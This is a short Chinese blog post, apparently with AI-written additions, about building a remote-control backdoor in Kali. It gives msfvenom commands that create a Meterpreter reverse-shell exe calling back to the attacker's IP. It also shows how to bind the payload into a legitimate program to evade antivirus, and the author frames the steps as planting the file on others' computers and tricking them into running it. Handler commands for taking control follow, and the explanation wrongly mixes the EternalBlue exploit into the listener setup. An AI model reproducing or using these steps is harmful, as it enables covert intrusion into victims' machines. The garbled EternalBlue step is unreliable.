Kali:做个简单的远程监听程序

本文详细描述了如何通过msfvenom工具在他人计算机上植入后门程序,利用永恒之蓝漏洞创建payload,并通过欺骗防火墙和诱导用户执行exe文件来获取权限。随后,作者展示了如何配置监听模块并执行操作以实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 首先进行如下的操作命令:

可以直接在当前目录下生成后门程序。

 别人计算机上被直接植入后面exe程序会被杀毒:

可以使用捆绑的命令-x,用来骗过部分防火墙软件。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.60.133 lport=4444 -f exe -x TxBugReport.exe -o demo.exe

 

成功在别人电脑上植入后门程序后,并且诱导其将exe运行后,我们可以使用远程监听模块了获取其后渗透的权限。

首先要先搜索到ms17_010永恒之蓝的漏洞,再使用其中的监听模块。

在模块中设置和后面程序一样的payload设置

比如:

set payload xxxx

set lhost xxxx

set port xxxx

然后就直接输入run命令就完事了。

### 创建简单远程控制木马用于教育目的 对于渗透测试或安全研究的学习,在Kali Linux环境中利用Metasploit框架可以创建一个简单远程控制木马。这涉及几个具体的操作命令和步骤说明。 #### 准备工作环境 确保已安装并配置好最新的Metasploit框架版本[^1]: ```bash sudo apt update && sudo apt upgrade -y sudo apt install metasploit-framework ``` 启动`msfconsole`进入交互界面: ```bash msfconsole ``` #### 使用MSFvenom生成Payload 通过`msfvenom`工具来生成恶意软件载荷(Payload),这里以Windows平台为目标,创建一个反向TCP连接类型的payload文件[^2]: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_local_IP LPORT=desired_port -f exe > shell.exe ``` - `-p`: 指定要使用的有效负载(payload)。 - `LHOST`: 设置本地监听IP地址。 - `LPORT`: 设定端口号等待来自目标系统的回调请求。 - `-f exe`: 输出格式为可执行(.exe)文件。 - `shell.exe`: 保存路径及名称。 #### 配置监听器 回到`msfconsole`设置一个多处理器(Multi Handler)作为服务器端接收从客户端发起的连接尝试: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost your_local_IP set lport desired_port exploit -j -z ``` 以上操作将在后台运行多处理程序,并保持静默模式(-j选项表示将其放入作业列表中,-z则是在攻击成功后继续执行其他指令而不暂停)。 请注意,上述过程仅适用于合法授权下的实验环境内进行的安全测试活动;任何未经授权的实际网络攻击行为均属违法行为!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值